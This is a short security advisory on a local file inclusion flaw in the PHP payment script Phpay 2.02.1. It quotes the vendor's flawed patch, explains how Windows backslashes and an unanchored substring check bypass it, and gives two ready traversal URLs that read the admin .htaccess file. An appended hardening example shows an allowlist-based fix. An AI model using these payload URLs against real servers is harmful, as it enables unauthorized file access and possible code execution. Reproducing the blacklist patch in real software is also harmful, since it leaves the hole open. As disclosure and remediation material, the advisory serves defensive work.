By Michael Brooks

Vulnerability Type: Local File Inclusion

Software: Phpay

Homepage: http://sourceforge.net/projects/phpay/

Version Affected: 2.02.1

Phpay has been affected by multiple local file include flaws; as a result, this patch was written:

// strip colons, then "../", then any remaining forward slash
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));

// fall back to the default if the value is empty or ".inc.php" appears nowhere in the string
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "\n";}

if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}

require("./$config");

To bypass this patch, backslashes can be used instead of forward slashes on Windows systems, since only forward slashes are stripped.

Also, .inc.php only has to exist *somewhere* in the string, because eregi() matches a substring.

Local File Include for Windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess

Remote code execution is accessible in the ./admin/ folder.

The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration:

There is a call to extract($_GET), so the exploit works regardless of the register_globals setting. Using Linux is a very good fix for this issue.
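For comparison, here is how the config selection could be hardened instead of blacklisting separators. This is an added example, not Phpay's code; it assumes the value arrives only as $_GET['config'] (no extract($_GET)) and that config files live in the script's own directory.

```php
<?php
// Added hardening example (not Phpay's own code): validate the requested
// name against an anchored allowlist and confine the resolved path to a
// fixed directory, instead of stripping "../", "/" and ":" and then
// checking for ".inc.php" as a mere substring.

function safe_config_path(string $requested, string $baseDir): ?string
{
    // Only a bare file name ending in .inc.php is acceptable. The regex is
    // anchored, so ".inc.php" cannot appear "somewhere in the string", and
    // neither forward nor backslashes can get through at all.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.inc\.php\z/', $requested)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }

    // Second line of defence: the resolved file must sit directly inside
    // the base directory (covers symlinks and platform path quirks).
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Usage in place of the original check (assumed parameter name "config"):
$requested = isset($_GET['config']) ? (string) $_GET['config'] : 'config.inc.php';
$config = safe_config_path($requested, __DIR__);
if ($config === null) {
    // unknown or malformed name: fall back to the default, never to user input
    $config = safe_config_path('config.inc.php', __DIR__);
    if ($config === null) {
        echo "panic: config.inc.php doesn't exist!";
        exit;
    }
}
require $config;
```

With this check, both advisory URLs above are rejected by the regex before any file-system call is made, on Windows and Linux alike.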

Merry Christmas